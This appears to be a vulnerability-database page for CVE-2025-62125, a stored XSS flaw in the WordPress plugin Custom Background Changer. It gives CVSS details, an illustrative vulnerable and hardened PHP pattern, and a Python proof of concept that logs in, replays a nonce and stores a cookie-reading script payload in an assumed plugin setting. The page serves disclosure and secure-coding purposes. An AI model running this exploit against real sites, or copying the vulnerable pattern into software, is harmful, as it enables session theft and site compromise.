Security Vulnerability Report
CVE-2025-62125 CVSS 6.5 MEDIUM


Published: 2025-12-31 13:15:42
Last Modified: 2026-04-23 15:34:35

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Anshul Gangrade Custom Background Changer (custom-background-changer) allows Stored XSS. This issue affects Custom Background Changer: from n/a through 3.0.
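The page does not show the plugin's source, so the following is an added illustration of the CWE-79 pattern behind this class of bug and its hardened counterpart, written for this page and not taken from the Custom Background Changer plugin. The option key, the function names, the `background_url` form field and the `manage_options` capability are all assumptions.

```php
<?php
/**
 * Hypothetical "background image URL" setting, written for this page as an
 * illustration. It is NOT the Custom Background Changer plugin's code; the
 * option key, function names and the background_url form field are assumed.
 */

/* ---- Vulnerable pattern (CWE-79): stored unchecked, echoed unescaped ---- */

function cbc_demo_save_vulnerable() {
    if ( isset( $_POST['background_url'] ) ) {
        // No capability check, no nonce, no sanitisation: any authenticated
        // user who can reach this handler persists arbitrary markup.
        update_option( 'cbc_demo_background_url', $_POST['background_url'] );
    }
}

function cbc_demo_render_vulnerable() {
    $url = get_option( 'cbc_demo_background_url', '' );
    // A stored value such as "><script>alert(document.cookie)</script> closes
    // the attribute and the script runs for every visitor who loads the page.
    echo '<img class="cbc-bg" src="' . $url . '" alt="">';
}

/* ---- Hardened pattern: authorise, verify nonce, validate on input, escape on output ---- */

function cbc_demo_save_hardened() {
    if ( ! isset( $_POST['background_url'] ) ) {
        return;
    }
    // Site-wide presentation settings are an administrator concern.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', '', array( 'response' => 403 ) );
    }
    // CSRF protection: the submitting form must carry the matching nonce.
    check_admin_referer( 'cbc_demo_save_background' );
    // Validate on input: esc_url_raw() strips characters that cannot appear in
    // a URL (quotes, angle brackets, whitespace) and returns '' for schemes
    // outside the allowlist, so javascript: and data: never reach the database.
    $url = esc_url_raw( wp_unslash( $_POST['background_url'] ), array( 'http', 'https' ) );
    update_option( 'cbc_demo_background_url', $url );
}

function cbc_demo_render_hardened() {
    $url = get_option( 'cbc_demo_background_url', '' );
    if ( '' === $url ) {
        return;
    }
    // Escape for the output context (a URL inside an HTML attribute) even
    // though the value was validated on save: defence in depth against
    // values written to the option by other code paths.
    printf( '<img class="cbc-bg" src="%s" alt="">', esc_url( $url ) );
}

/* The settings form pairs with the hardened handler via the same nonce action. */
function cbc_demo_settings_form() {
    $url = get_option( 'cbc_demo_background_url', '' );
    echo '<form method="post">';
    wp_nonce_field( 'cbc_demo_save_background' );
    echo '<input type="url" name="background_url" value="' . esc_attr( $url ) . '">';
    submit_button( 'Save Changes' );
    echo '</form>';
}
```

The CVSS vector on this page (PR:L) says the real bug was reachable from a low-privilege account, so when reviewing the patched release the first things to look for are a capability check on the save path and context-appropriate escaping (`esc_url()`, `esc_attr()`, `esc_html()`) wherever the stored value is printed.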

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Reading the vector: the attacker needs an authenticated low-privilege account (PR:L) and a victim who loads the page containing the stored payload (UI:R); the script then runs in the victim's browser rather than in the plugin's own security scope (S:C), which is why an XSS with low per-metric impact still scores Medium.

Configurations (Affected Products)

No CPE configuration data is available for this entry (NVD status: Deferred). Affected versions according to the description:

Custom Background Changer <= 3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import re
import sys
from urllib.parse import quote

import requests

# CVE-2025-62125 PoC - Stored XSS in Custom Background Changer
# Target: WordPress site with vulnerable Custom Background Changer plugin (<= 3.0)
TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker"  # Low-privilege user account (CVSS PR:L)
PASSWORD = "password"
XSS_PAYLOAD = "<script>alert(document.cookie)</script>"


def is_logged_in(session):
    """WordPress names its auth cookie wordpress_logged_in_<hash>, so match on the prefix."""
    return any(name.startswith("wordpress_logged_in") for name in session.cookies.get_dict())


def exploit_stored_xss():
    """
    Exploit the stored XSS vulnerability in the Custom Background Changer plugin.

    Demonstrates how an attacker with low privileges can inject JavaScript
    that is stored and later executed in the browser of every visitor.
    """
    session = requests.Session()

    # Step 1: Log in to WordPress with the low-privilege account
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        "log": USERNAME,
        "pwd": PASSWORD,
        "wp-submit": "Log In",
        "redirect_to": f"{TARGET_URL}/wp-admin/",
    }
    session.post(login_url, data=login_data)
    if not is_logged_in(session):
        print("[-] Login failed")
        return False
    print("[+] Login successful")

    # Step 2: Inject the payload via the plugin settings page.
    # The exact endpoint and parameter names depend on the plugin implementation;
    # the values below are assumptions for a typical admin page at
    # wp-admin/admin.php?page=custom-background-changer.
    admin_url = f"{TARGET_URL}/wp-admin/admin.php?page=custom-background-changer"

    # WordPress settings forms normally carry a CSRF nonce in a hidden _wpnonce
    # field; fetch the page first and replay the nonce if one is present.
    page = session.get(admin_url)
    exploit_data = {
        "background_url": XSS_PAYLOAD,
        "submit": "Save Changes",
    }
    nonce = re.search(r'name="_wpnonce"\s+value="([^"]+)"', page.text)
    if nonce:
        exploit_data["_wpnonce"] = nonce.group(1)
    session.post(admin_url, data=exploit_data)

    # Step 3: Verify the payload is stored by loading a page where the
    # background changer output is rendered (the front page here).
    response = session.get(f"{TARGET_URL}/")
    if XSS_PAYLOAD in response.text:
        print("[+] XSS payload successfully stored!")
        print("[+] Payload will execute when users visit affected pages")
        print(f"[+] Payload URL encoded: {quote(XSS_PAYLOAD)}")
        return True
    print("[-] XSS payload not found - may require manual verification")
    return False


if __name__ == "__main__":
    print("CVE-2025-62125 - Custom Background Changer Stored XSS PoC")
    print("=" * 60)
    sys.exit(0 if exploit_stored_xss() else 1)

References

Patchstack advisory (source listed in the NVD record below): https://patchstack.com/database/Wordpress/Plugin/custom-background-changer/vulnerability/wordpress-custom-background-changer-plugin-3-0-cross-site-scripting-xss-vulnerability?_s_id=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62125", "sourceIdentifier": "[email protected]", "published": "2025-12-31T13:15:41.650", "lastModified": "2026-04-23T15:34:35.323", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Anshul Gangrade Custom Background Changer custom-background-changer allows Stored XSS.This issue affects Custom Background Changer: from n/a through <= 3.0."}, {"lang": "es", "value": "Vulnerabilidad de Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') en Anshul Gangrade Custom Background Changer custom-background-changer permite XSS Almacenado. Este problema afecta a Custom Background Changer: desde n/a hasta 3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/custom-background-changer/vulnerability/wordpress-custom-background-changer-plugin-3-0-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}